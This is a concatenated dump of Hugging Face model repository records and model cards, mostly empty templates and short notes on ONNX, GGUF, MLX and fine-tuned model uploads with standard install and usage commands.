#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
onnxmodelzoo/seresnext26tn_32x4d_Opset17
|
onnxmodelzoo
| 2025-09-23T17:46:47Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:46:39Z |
---
language: en
license: apache-2.0
model_name: seresnext26tn_32x4d_Opset17.onnx
tags:
- Computer_Vision
---
|
harborwater/LFM2-2.6B-Q4_K_M-GGUF
|
harborwater
| 2025-09-23T17:45:56Z | 0 | 0 |
transformers
|
[
"transformers",
"gguf",
"liquid",
"lfm2",
"edge",
"llama-cpp",
"gguf-my-repo",
"text-generation",
"en",
"ar",
"zh",
"fr",
"de",
"ja",
"ko",
"es",
"base_model:LiquidAI/LFM2-2.6B",
"base_model:quantized:LiquidAI/LFM2-2.6B",
"license:other",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T17:45:47Z |
---
library_name: transformers
license: other
license_name: lfm1.0
license_link: LICENSE
language:
- en
- ar
- zh
- fr
- de
- ja
- ko
- es
pipeline_tag: text-generation
tags:
- liquid
- lfm2
- edge
- llama-cpp
- gguf-my-repo
base_model: LiquidAI/LFM2-2.6B
---
# harborwater/LFM2-2.6B-Q4_K_M-GGUF
This model was converted to GGUF format from [`LiquidAI/LFM2-2.6B`](https://huggingface.co/LiquidAI/LFM2-2.6B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/LiquidAI/LFM2-2.6B) for more details on the model.
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo harborwater/LFM2-2.6B-Q4_K_M-GGUF --hf-file lfm2-2.6b-q4_k_m.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo harborwater/LFM2-2.6B-Q4_K_M-GGUF --hf-file lfm2-2.6b-q4_k_m.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag along with other hardware-specific flags (e.g., `LLAMA_CUDA=1` for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo harborwater/LFM2-2.6B-Q4_K_M-GGUF --hf-file lfm2-2.6b-q4_k_m.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo harborwater/LFM2-2.6B-Q4_K_M-GGUF --hf-file lfm2-2.6b-q4_k_m.gguf -c 2048
```
|
NexVeridian/Qwen3Guard-Gen-4B-6bit
|
NexVeridian
| 2025-09-23T17:44:37Z | 0 | 0 |
mlx
|
[
"mlx",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"base_model:Qwen/Qwen3Guard-Gen-4B",
"base_model:quantized:Qwen/Qwen3Guard-Gen-4B",
"license:apache-2.0",
"6-bit",
"region:us"
] |
text-generation
| 2025-09-23T17:42:54Z |
---
library_name: mlx
license: apache-2.0
license_link: https://huggingface.co/Qwen/Qwen3Guard-Gen-4B/blob/main/LICENSE
pipeline_tag: text-generation
base_model: Qwen/Qwen3Guard-Gen-4B
tags:
- mlx
---
# NexVeridian/Qwen3Guard-Gen-4B-6bit
This model [NexVeridian/Qwen3Guard-Gen-4B-6bit](https://huggingface.co/NexVeridian/Qwen3Guard-Gen-4B-6bit) was
converted to MLX format from [Qwen/Qwen3Guard-Gen-4B](https://huggingface.co/Qwen/Qwen3Guard-Gen-4B)
using mlx-lm version **0.28.0**.
## Use with mlx
```bash
pip install mlx-lm
```
```python
from mlx_lm import load, generate
model, tokenizer = load("NexVeridian/Qwen3Guard-Gen-4B-6bit")
prompt = "hello"
if tokenizer.chat_template is not None:
messages = [{"role": "user", "content": prompt}]
prompt = tokenizer.apply_chat_template(
messages, add_generation_prompt=True
)
response = generate(model, tokenizer, prompt=prompt, verbose=True)
```
|
onnxmodelzoo/seresnet50_Opset16
|
onnxmodelzoo
| 2025-09-23T17:44:04Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:43:53Z |
---
language: en
license: apache-2.0
model_name: seresnet50_Opset16.onnx
tags:
- Computer_Vision
---
|
MohamedAhmedAE/Llama-3.2-1B-Instruct-Medical-Finetune-v4
|
MohamedAhmedAE
| 2025-09-23T17:43:47Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:meta-llama/Llama-3.2-1B-Instruct",
"base_model:finetune:meta-llama/Llama-3.2-1B-Instruct",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T17:29:19Z |
---
base_model: meta-llama/Llama-3.2-1B-Instruct
library_name: transformers
model_name: Llama-3.2-1B-Instruct-Medical-Finetune-v4
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for Llama-3.2-1B-Instruct-Medical-Finetune-v4
This model is a fine-tuned version of [meta-llama/Llama-3.2-1B-Instruct](https://huggingface.co/meta-llama/Llama-3.2-1B-Instruct).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="MohamedAhmedAE/Llama-3.2-1B-Instruct-Medical-Finetune-v4", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/mohamed-ahmed/Llama-3.2-1B-Instruct-Medical-Finetune-v4/runs/7pmf3z1d)
This model was trained with SFT.
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.4
- Pytorch: 2.8.0
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
onnxmodelzoo/seresnet33ts_Opset16
|
onnxmodelzoo
| 2025-09-23T17:43:44Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:43:35Z |
---
language: en
license: apache-2.0
model_name: seresnet33ts_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/seresnet152d_Opset17
|
onnxmodelzoo
| 2025-09-23T17:43:35Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:43:14Z |
---
language: en
license: apache-2.0
model_name: seresnet152d_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/seresnet152d_Opset16
|
onnxmodelzoo
| 2025-09-23T17:43:13Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:42:53Z |
---
language: en
license: apache-2.0
model_name: seresnet152d_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/sequencer2d_l_Opset16
|
onnxmodelzoo
| 2025-09-23T17:42:04Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:41:39Z |
---
language: en
license: apache-2.0
model_name: sequencer2d_l_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/semnasnet_075_Opset17
|
onnxmodelzoo
| 2025-09-23T17:40:24Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:40:19Z |
---
language: en
license: apache-2.0
model_name: semnasnet_075_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/selecsls60_Opset18
|
onnxmodelzoo
| 2025-09-23T17:39:33Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:39:21Z |
---
language: en
license: apache-2.0
model_name: selecsls60_Opset18.onnx
tags:
- Computer_Vision
---
|
NexVeridian/Qwen3Guard-Gen-4B-3bit
|
NexVeridian
| 2025-09-23T17:39:28Z | 0 | 0 |
mlx
|
[
"mlx",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"base_model:Qwen/Qwen3Guard-Gen-4B",
"base_model:quantized:Qwen/Qwen3Guard-Gen-4B",
"license:apache-2.0",
"3-bit",
"region:us"
] |
text-generation
| 2025-09-23T17:38:20Z |
---
library_name: mlx
license: apache-2.0
license_link: https://huggingface.co/Qwen/Qwen3Guard-Gen-4B/blob/main/LICENSE
pipeline_tag: text-generation
base_model: Qwen/Qwen3Guard-Gen-4B
tags:
- mlx
---
# NexVeridian/Qwen3Guard-Gen-4B-3bit
This model [NexVeridian/Qwen3Guard-Gen-4B-3bit](https://huggingface.co/NexVeridian/Qwen3Guard-Gen-4B-3bit) was
converted to MLX format from [Qwen/Qwen3Guard-Gen-4B](https://huggingface.co/Qwen/Qwen3Guard-Gen-4B)
using mlx-lm version **0.28.0**.
## Use with mlx
```bash
pip install mlx-lm
```
```python
from mlx_lm import load, generate
model, tokenizer = load("NexVeridian/Qwen3Guard-Gen-4B-3bit")
prompt = "hello"
if tokenizer.chat_template is not None:
messages = [{"role": "user", "content": prompt}]
prompt = tokenizer.apply_chat_template(
messages, add_generation_prompt=True
)
response = generate(model, tokenizer, prompt=prompt, verbose=True)
```
|
onnxmodelzoo/sebotnet33ts_256_Opset16
|
onnxmodelzoo
| 2025-09-23T17:38:10Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:38:02Z |
---
language: en
license: apache-2.0
model_name: sebotnet33ts_256_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/rexnet_200_Opset17
|
onnxmodelzoo
| 2025-09-23T17:38:02Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:37:53Z |
---
language: en
license: apache-2.0
model_name: rexnet_200_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/rexnet_200_Opset16
|
onnxmodelzoo
| 2025-09-23T17:37:53Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:37:44Z |
---
language: en
license: apache-2.0
model_name: rexnet_200_Opset16.onnx
tags:
- Computer_Vision
---
|
Jeganmurali/OrpheusTamil
|
Jeganmurali
| 2025-09-23T17:37:34Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"en",
"base_model:unsloth/orpheus-3b-0.1-ft",
"base_model:finetune:unsloth/orpheus-3b-0.1-ft",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T17:36:59Z |
---
base_model: unsloth/orpheus-3b-0.1-ft
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** Jeganmurali
- **License:** apache-2.0
- **Finetuned from model :** unsloth/orpheus-3b-0.1-ft
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
onnxmodelzoo/rexnet_130_Opset16
|
onnxmodelzoo
| 2025-09-23T17:37:23Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:37:17Z |
---
language: en
license: apache-2.0
model_name: rexnet_130_Opset16.onnx
tags:
- Computer_Vision
---
|
Josemv20/prueba2
|
Josemv20
| 2025-09-23T17:37:10Z | 0 | 0 |
diffusers
|
[
"diffusers",
"text-to-image",
"lora",
"template:diffusion-lora",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"region:us"
] |
text-to-image
| 2025-09-23T17:36:47Z |
---
tags:
- text-to-image
- lora
- diffusers
- template:diffusion-lora
widget:
- output:
url: images/2.png
text: >-
4K, HD, high resolution, masterpiece, best quality, face, best quality,
masterpiece, official screencap, source_screencap, official style, blaash,
tmosth, flat color, black shading, sloppy coloring, hatching \(texture\), ,
krekkov, 1girl, skindentation), ((Masterpiece, best quality, shadows,
extremely detailed, intricate, solo, source_anime),
parameters:
negative_prompt: >-
realistic, semi-realistic, ultra realistic, sharp face, pale skin,
duplicate, futanari, paizuri, multiple females, extra toes, extra limbs,
extra head, floating, blurry, blurry penis, (watermark, patreon, text),
oversized penis. female off screen, female not visible, female face off
screen, multiple feet, extra toes, extra fingers, duplicate, impossible
shapes, futa, deformed tongue, deformed lip, Watermark, censored,
deformed, bad anatomy, disfigured, poorly drawn face, mutated, extra limb,
ugly, poorly drawn hands, missing limb, floating limbs, disconnected
limbs, disconnected head, malformed hands, long neck, mutated hands and
fingers, bad hands, missing fingers, cropped, worst quality, low quality,
mutation, poorly drawn, huge calf, bad hands, fused hand, missing hand,
disappearing arms, disappearing thigh, disappearing calf, disappearing
legs, missing fingers, fused fingers, abnormal eye proportion, Abnormal
hands, abnormal legs, abnormal feet, abnormal fingers, muscular female,
big shoulders,
base_model: black-forest-labs/FLUX.1-dev
instance_prompt: null
---
# prueba2
<Gallery />
## Download model
[Download](/Josemv20/prueba2/tree/main) them in the Files & versions tab.
|
phospho-app/ACT-Marker_pickup_piper-0zn73t37mb
|
phospho-app
| 2025-09-23T17:35:12Z | 0 | 0 |
phosphobot
|
[
"phosphobot",
"safetensors",
"act",
"robotics",
"dataset:LegrandFrederic/Marker_pickup_piper",
"region:us"
] |
robotics
| 2025-09-23T14:55:21Z |
---
datasets: LegrandFrederic/Marker_pickup_piper
library_name: phosphobot
pipeline_tag: robotics
model_name: act
tags:
- phosphobot
- act
task_categories:
- robotics
---
# act model - 🧪 phosphobot training pipeline
- **Dataset**: [LegrandFrederic/Marker_pickup_piper](https://huggingface.co/datasets/LegrandFrederic/Marker_pickup_piper)
- **Wandb run id**: None
## This model was trained using **[🧪phospho](https://phospho.ai)**
Training was successful, try it out on your robot!
## Training parameters
```text
{
"batch_size": 60,
"steps": 8000,
"save_freq": 5000
}
```
📖 **Get Started**: [docs.phospho.ai](https://docs.phospho.ai?utm_source=huggingface_readme)
🤖 **Get your robot**: [robots.phospho.ai](https://robots.phospho.ai?utm_source=huggingface_readme)
|
SkieyFly/pi05-so101_block_to_container_all-state_tokens_1-interval_32-rand
|
SkieyFly
| 2025-09-23T17:34:43Z | 0 | 0 | null |
[
"safetensors",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:31:26Z |
---
license: apache-2.0
---
|
arthinfinity/Qwen2.5-0.5B-Instruct-Gensyn-Swarm-stubby_melodic_eel
|
arthinfinity
| 2025-09-23T17:29:14Z | 75 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"rl-swarm",
"genrl-swarm",
"grpo",
"gensyn",
"I am stubby_melodic_eel",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-22T03:33:31Z |
---
library_name: transformers
tags:
- rl-swarm
- genrl-swarm
- grpo
- gensyn
- I am stubby_melodic_eel
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
jq/qwen3-32b-sunflower-20250923
|
jq
| 2025-09-23T17:27:16Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"qwen3",
"trl",
"en",
"base_model:jq/sunflower-32b-pretrained",
"base_model:finetune:jq/sunflower-32b-pretrained",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T17:26:59Z |
---
base_model: jq/sunflower-32b-pretrained
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** jq
- **License:** apache-2.0
- **Finetuned from model :** jq/sunflower-32b-pretrained
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
KairoNet/Auranet_K6
|
KairoNet
| 2025-09-23T17:22:56Z | 0 | 0 | null |
[
"safetensors",
"any-to-any",
"omega",
"omegalabs",
"bittensor",
"agi",
"license:mit",
"region:us"
] |
any-to-any
| 2025-09-22T18:43:37Z |
---
license: mit
tags:
- any-to-any
- omega
- omegalabs
- bittensor
- agi
---
This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet.
Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
|
alixagari2000/LLMsimplified
|
alixagari2000
| 2025-09-23T17:22:36Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-22T23:14:28Z |
---
license: apache-2.0
---
This script is a very simple version of a language model-based chatbot, sometimes referred to as a mini LLM (though it’s not really a language model in the true sense). It uses pre-trained word embeddings from spaCy and Logistic Regression from scikit-learn to classify user input into a small number of predefined categories (called "intents").
🔍 Detailed Explanation
1. Importing Libraries
```python
import spacy
from sklearn.linear_model import LogisticRegression
import numpy as np
```
- `spacy`: Used to process text and convert it into word vectors using a pre-trained language model (`en_core_web_md`).
- `LogisticRegression`: A simple ML classifier from scikit-learn for categorizing input text into predefined labels (intents).
- `numpy`: Used here implicitly for reshaping vectors.
2. Load the Pre-trained Language Model
```python
nlp = spacy.load("en_core_web_md")
```
Loads the medium-sized English model that includes 300-dimensional word vectors.
These vectors represent semantic meaning—similar words have vectors close together.
3. Training Data
```python
X_train = [
    "hi", "Hi", "hello", "Hello", "helo", ...
]
y_train = [
    "greet", "greet", "greet", ...
]
```
- `X_train`: A list of example user inputs (utterances).
- `y_train`: A list of corresponding intents (categories) for each input.

3 intents here:
- `"greet"` – greetings
- `"intro"` – self-introduction
- `"bye"` – goodbyes
📌 Note: This is a form of intent classification, a core component of many conversational agents.
4. Convert Sentences to Vectors
```python
X_vectors = [nlp(text).vector for text in X_train]
```
Each sentence is passed through the spaCy model, which returns a 300-dimensional vector representing the sentence.
This vector is the mean of the word vectors in the sentence (default behavior in spaCy).
This transforms the text into a form that a machine learning model can understand (numerical data).
5. Train the Classifier
```python
clf = LogisticRegression()
clf.fit(X_vectors, y_train)
```
A Logistic Regression classifier is trained to associate vectors with the correct intent (greet, intro, or bye).
Despite its name, LogisticRegression is a good baseline for multi-class classification.
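The multi-class behavior can be seen on toy 2-D vectors (the clusters below are hypothetical stand-ins for the 300-dimensional spaCy embeddings, so the example runs without any model download):

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

# Toy 2-D "embeddings": one well-separated cluster per intent.
X = np.array([
    [1.0, 0.0], [0.9, 0.1],     # "greet"
    [0.0, 1.0], [0.1, 0.9],     # "intro"
    [-1.0, -1.0], [-0.9, -1.1], # "bye"
])
y = ["greet", "greet", "intro", "intro", "bye", "bye"]

clf = LogisticRegression()
clf.fit(X, y)

# A new point near the "greet" cluster is classified accordingly.
print(clf.predict(np.array([[0.95, 0.05]])))  # ['greet']
```

The same fit/predict flow applies unchanged when the toy vectors are swapped for real sentence vectors.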
6. Prediction Example
text = "yo"
vec = nlp(text).vector.reshape(1, -1)
print(clf.predict(vec)) # likely to predict "greet"
Takes a test input ("yo"), converts it to a vector, reshapes it to match the model’s expected input shape ((1, 300)), and predicts the intent.
It will likely return "greet" because "yo" is semantically close to "hi", "hello", etc.
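The reshape step matters because scikit-learn's `predict` expects a 2-D array of shape `(n_samples, n_features)`, while a single sentence vector comes back 1-D. A minimal numpy sketch (using a toy 4-dimensional vector in place of spaCy's 300-dimensional one):

```python
import numpy as np

# A single "sentence vector" is 1-D, e.g. shape (300,) from spaCy.
vec = np.array([0.1, 0.2, 0.3, 0.4])  # toy 4-dim stand-in
print(vec.shape)  # (4,)

# reshape(1, -1) adds a batch axis: one sample, all features.
batch = vec.reshape(1, -1)
print(batch.shape)  # (1, 4)
```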
7. Interactive Command-Line Chat Loop
```python
if __name__ == "__main__":
    ...
```
Starts an interactive loop where users can input text and get a predicted intent.
Exits on typing "exit".
Every input is processed the same way:
Text → vector using spaCy
Vector → predicted intent using Logistic Regression
Result is printed
🧠 How This Is (and Isn't) Like a Real LLM
| ✅ Simple LLM-Like Component | ❌ Not a Full LLM |
|---|---|
| Uses word embeddings | Doesn't generate text |
| Performs intent classification | No context tracking |
| Pretrained language model (spaCy) | Not autoregressive |
| Handles basic input/output | No large-scale understanding or reasoning |
So while it's not an actual LLM like GPT or BERT, it uses some language model features (word vectors) to do simple NLP classification.
🧪 How You Could Extend This
To make this closer to a real chatbot:
- Add more intents and training examples.
- Add a `get_response()` function to reply meaningfully to each intent.
- Use a larger model or fine-tune a transformer like BERT for better accuracy.
- Add multi-turn conversation memory (context tracking).
- Connect it to a GUI or messaging platform.
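The `get_response()` idea above can be sketched as a simple lookup (the replies below are hypothetical examples, not part of the original script):

```python
# Map each predicted intent to a canned reply; fall back for unknown intents.
RESPONSES = {
    "greet": "Hello! How can I help you?",
    "intro": "I'm a tiny intent-classifier chatbot.",
    "bye": "Goodbye!",
}

def get_response(intent: str) -> str:
    return RESPONSES.get(intent, "Sorry, I didn't understand that.")

print(get_response("greet"))    # Hello! How can I help you?
print(get_response("unknown"))  # Sorry, I didn't understand that.
```

In the chat loop, this would be called with the classifier's predicted intent instead of printing the raw label.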
🔚 Summary
This script is a basic chatbot intent classifier:
- Converts input into vectors using spaCy word embeddings.
- Classifies into intents (greet, intro, bye) using Logistic Regression.
- Responds via command line based on the predicted intent.
|
Stef7177/camembert-triathlon-coach-v3
|
Stef7177
| 2025-09-23T17:18:34Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"camembert",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T16:18:33Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
